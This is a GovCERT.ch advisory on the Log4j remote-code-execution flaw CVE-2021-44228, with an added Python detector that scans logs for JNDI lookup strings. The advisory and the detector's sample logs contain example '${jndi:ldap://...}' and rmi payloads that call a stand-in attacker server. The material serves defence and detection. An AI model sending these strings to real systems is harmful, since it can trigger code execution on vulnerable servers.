Zero-Day Exploit Targeting Popular Java Library Log4j

Published on December 12, 2021 19:20 +0100 by GovCERT.ch. Last updated on December 12, 2021 19:20 +0100.


On Friday morning, NCSC/GovCERT.ch received reports about a critical vulnerability in the popular Java library “Log4j”. At the time these reports came in, the vulnerability was apparently already being exploited by threat actors “in the wild”, and no patch was available to fix it (a 0-day exploit).


Log4j is a popular Java library developed and maintained by the Apache Foundation. It is widely adopted and used in many commercial and open-source software products as a logging framework for Java.


The vulnerability (CVE-2021-44228) is critical, as it can be exploited remotely by an unauthenticated adversary to execute arbitrary code (remote code execution, RCE). It has a score of 10 (out of 10) in the Common Vulnerability Scoring System (CVSS), which rates how severe a vulnerability is.


The vulnerability results from how log messages are handled by the log4j processor. If an attacker sends a specially crafted message (one containing a string like ${jndi:ldap://rogueldapserver.com/a}), the message lookup may resolve that string by fetching a code class from the external server and executing it, a situation known as Remote Code Execution (RCE).
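As an added example, not part of the advisory, the following Python detector scans log lines for the `${jndi:...}` lookup string described above and reports the scheme and callback host a responder would need to block and search for. The sample log lines, host names and IP addresses are constructed; treating the lookup prefix case-insensitively is an assumption about Log4j's lookup handling, not something the advisory states.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines (not from the advisory): an HTTP access log whose
# request fields are later written through Log4j by the application.
SAMPLE_LOG_LINES = [
    '198.51.100.7 - - [10/Dec/2021:09:12:01 +0100] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:09:12:07 +0100] "GET /login HTTP/1.1" 200 311 "-" "${jndi:ldap://rogueldapserver.com/a}"',
    '198.51.100.9 - - [10/Dec/2021:09:12:09 +0100] "GET /api?q=${jndi:rmi://203.0.113.5:1099/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.11 - - [10/Dec/2021:09:13:00 +0100] "GET /?s=${date:yyyy} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

@dataclass(frozen=True)
class JndiFinding:
    lookup: str   # the full ${jndi:...} expression as it appeared in the line
    scheme: str   # ldap, rmi, dns, ... as written after "jndi:"
    target: str   # host[:port] the lookup would contact

def extract_lookups(text: str) -> list[str]:
    """Return every ${...} expression in text, matching braces so that nested
    lookups (Log4j allows ${a:${b}}) are captured whole instead of being cut
    off at the first closing brace, as a naive regex would do."""
    found, i = [], 0
    while True:
        start = text.find("${", i)
        if start < 0:
            return found
        depth, j = 0, start
        while j < len(text):
            if text.startswith("${", j):
                depth += 1; j += 2; continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    found.append(text[start:j + 1]); break
            j += 1
        i = j + 1  # an unterminated "${" is skipped rather than flagged

# Assumption: the "jndi" prefix is matched case-insensitively.
_JNDI = re.compile(r"^\$\{jndi:([a-z0-9+.-]+)://([^/\s}]+)", re.IGNORECASE)

def find_jndi_lookups(line: str) -> list[JndiFinding]:
    """Flag each lookup in the line whose prefix is jndi; other Log4j lookups
    such as ${date:...} are benign here and are left alone."""
    findings = []
    for expr in extract_lookups(line):
        m = _JNDI.match(expr)
        if m:
            findings.append(JndiFinding(expr, m.group(1).lower(), m.group(2)))
    return findings

def scan(lines):
    """Return (line number, finding) pairs for every JNDI lookup in the input."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in find_jndi_lookups(line)]

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: {f.scheme} -> {f.target}  ({f.lookup})")
```

Feed it the raw request logs of the web tier rather than the application's Log4j output: by the time the string reaches a vulnerable Log4j it may already have been resolved, and the evidence is in the upstream log.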



The vulnerability is also somewhat complex: while a product may be vulnerable, that does not necessarily mean the vulnerability can be successfully exploited, as this depends on several pre- and postconditions such as the JVM being used, the actual configuration, etc. Any version of log4j between 2.0 and 2.14.1 is affected.


As soon as a patch got released on Friday afternoon, we published an ..
